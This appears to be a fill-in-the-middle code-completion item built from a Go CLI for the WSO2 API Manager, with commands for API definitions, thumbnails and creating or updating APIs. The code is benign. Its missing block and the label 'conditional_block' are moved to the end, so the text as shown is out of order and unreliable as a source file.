if ctx.NArg() != 2 {
return errors.New("ID and SWAGGERFILE are required")
}
id := ctx.Args().Get(0)
def, err := wso2am.NewAPIDefinitionFromFile(ctx.Args().Get(1))
if err != nil {
return err
}
if _, err := c.client.UpdateAPIDefinition(id, def); err != nil {
return err
}
return nil
},
}
}
func (c *CLI) apiThumbnail() cli.Command {
return cli.Command{
Name: "thumbnail",
Usage: "Download the thumbnail",
ArgsUsage: "ID",
Action: func(ctx *cli.Context) error {
if ctx.NArg() != 1 {
return errors.New("ID is required")
}
id := ctx.Args().Get(0)
return c.client.Thumbnail(id, os.Stdout)
},
}
}
func (c *CLI) apiUploadThumbnail() cli.Command {
return cli.Command{
Name: "upload-thumbnail",
Usage: "Upload the thumbnail",
ArgsUsage: "ID FILE",
Action: func(ctx *cli.Context) error {
if ctx.NArg() != 2 {
return errors.New("ID and FILE are required")
}
id := ctx.Args().Get(0)
file := ctx.Args().Get(1)
f, err := os.Open(file)
if err != nil {
return err
}
defer f.Close()
if _, err := c.client.UploadThumbnail(id, f); err != nil {
return err
}
return nil
},
}
}
func (c *CLI) apiCreate(update bool) cli.Command {
var commandName string
var commandAliases []string
var commandUsage string
var commandArgsUsage string
flags := []cli.Flag{
cli.StringFlag{
Name: "definition",
},
cli.StringFlag{
Name: "name",
},
cli.StringFlag{
Name: "context",
},
cli.StringFlag{
Name: "version",
},
cli.StringFlag{
Name: "provider",
},
cli.StringFlag{
Name: "production-url",
Value: "http://localhost/",
},
cli.StringFlag{
Name: "sandbox-url",
Value: "http://localhost/",
},
cli.StringFlag{
Name: "gateway-env",
},
cli.BoolFlag{
Name: "publish,P",
},
cli.StringSliceFlag{
Name: "visible-role",
},
}
if update {
commandName = "update"
commandUsage = "Update the API"
commandArgsUsage = "ID"
} else {
commandName = "create"
commandAliases = []string{"new"}
commandUsage = "Create the API"
flags = append(flags, cli.BoolFlag{
Name: "update",
})
}
return cli.Command{
Name: commandName,
Aliases: commandAliases,
Usage: commandUsage,
ArgsUsage: commandArgsUsage,
Flags: flags,
Action: func(ctx *cli.Context) error {
if update {
if ctx.NArg() != 1 {
return errors.New("APIID is required")
}
unmodifiableFlags := []string{"name", "version", "context", "provider", "state"}
for _, f := range unmodifiableFlags {
if ctx.IsSet(f) {
return fmt.Errorf("cannot update %q", f)
}
}
} else {
if err := c.checkRequiredParameters(ctx, "definition", "name", "context", "version", "production-url", "gateway-env"); err != nil {
return err
}
}
var api *wso2am.APIDetail
if update {
id := ctx.Args().First()
a, err := c.client.API(id)
if err != nil {
return err
}
api = a
} else {
api = c.client.NewAPI()
}
if ctx.IsSet("definition") {
swaggerFile := ctx.String("definition")
def, err := wso2am.NewAPIDefinitionFromFile(swaggerFile)
if err != nil {
return err
}
api.Definition = def
}
if ctx.IsSet("name") {
api.Name = ctx.String("name")
}
if ctx.IsSet("context") {
api.Context = ctx.String("context")
}
if ctx.IsSet("version") |
if ctx.IsSet("gateway-env") {
api.GatewayEnvironments = ctx.String("gateway-env")
}
if ctx.IsSet("provider") {
api.Provider = ctx.String("provider")
}
if ctx.IsSet("visible-role") {
api.Visibility = wso2am.APIVisibilityRestricted
api.VisibleRoles = ctx.StringSlice("visible-role")
}
// endpoint config
if ctx.IsSet("production-url") || ctx.IsSet("sandbox-url") {
endpointConfig := &wso2am.APIEndpointConfig{
Type: "http",
}
var productionURL = ctx.String("production-url")
var sandboxURL = ctx.String("sandbox-url")
endpointConfig.ProductionEndpoints = &wso2am.APIEndpoint{
URL: productionURL,
}
if sandboxURL != "" {
endpointConfig.SandboxEndpoints = &wso2am.APIEndpoint{
URL: sandboxURL,
}
}
api.SetEndpointConfig(endpointConfig)
}
// if "--update" is specified with create command, find the API ID and update it.
updateOrCreate := ctx.Bool("update")
if updateOrCreate {
// find API ID by context and version
a, err := c.findAPIByContextVersion(api.Context, api.Version)
if err != nil {
return err
}
if a != nil {
api.ID = a.ID
}
}
// call API
var res *wso2am.APIDetail
var err error
if update || (updateOrCreate && api.ID != "") {
res, err = c.client.UpdateAPI(api)
} else {
res, err = c.client.CreateAPI(api)
}
if err != nil {
return err
}
// print the ID of the created API
if !update {
fmt.Println(res.ID)
}
// publish
if ctx.Bool("publish") {
return c.client.ChangeAPIStatus(res.ID, wso2am.APIActionPublish)
}
return nil
},
}
}
func (c *CLI) findAPIByContextVersion(context, version string) (*wso2am.API, error) {
result, err := c.client.SearchResultToSlice(func(entryc chan<- interface{}, errc chan<- error, done <-chan struct{}) {
c.client.SearchAPIsRaw(fmt.Sprintf("context:%s", context), entryc, errc, done)
})
if err != nil {
return nil, err
}
normalizeContext := func(context string) string {
if strings.HasPrefix(context, "/") {
context = context[1:]
}
if strings.HasSuffix(context, "/") {
context = context[:len(context)-1]
}
return context
}
for _, v := range result {
api := c.client.ConvertToAPI(v)
if normalizeContext(api.Context) == normalizeContext(context) && api.Version == version {
return api, nil
}
}
return nil, nil
}
| {
api.Version = ctx.String("version")
} | conditional_block |